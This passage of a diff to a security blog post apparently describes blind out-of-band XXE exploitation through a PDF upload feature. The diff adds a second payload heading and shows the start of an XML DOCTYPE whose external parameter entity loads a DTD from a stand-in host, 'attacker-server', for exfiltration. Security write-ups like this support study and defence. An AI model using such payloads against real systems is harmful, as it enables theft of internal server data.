saurinn/saurinn.github.com/src/pages/blog/xxe-oob-via-a-pdf-upload.md

 Due to the nature of the feature, no direct feedback was available after every upload, therefore an error based XXE was not possible, so I had to go with the Blind route using Out-of-Band attacks to try to exfiltrate internal information.

 I had to try different variations of External Parameter entities (an entity referenced inside the DTD).
-After some trial and error I came up with a working payload:
+After some trial and error I came up with two working payloads:

+### 1st. payload:

 ```xml
 <!DOCTYPE root [ <!ENTITY % ext SYSTEM "https://attacker-server/poc.dtd">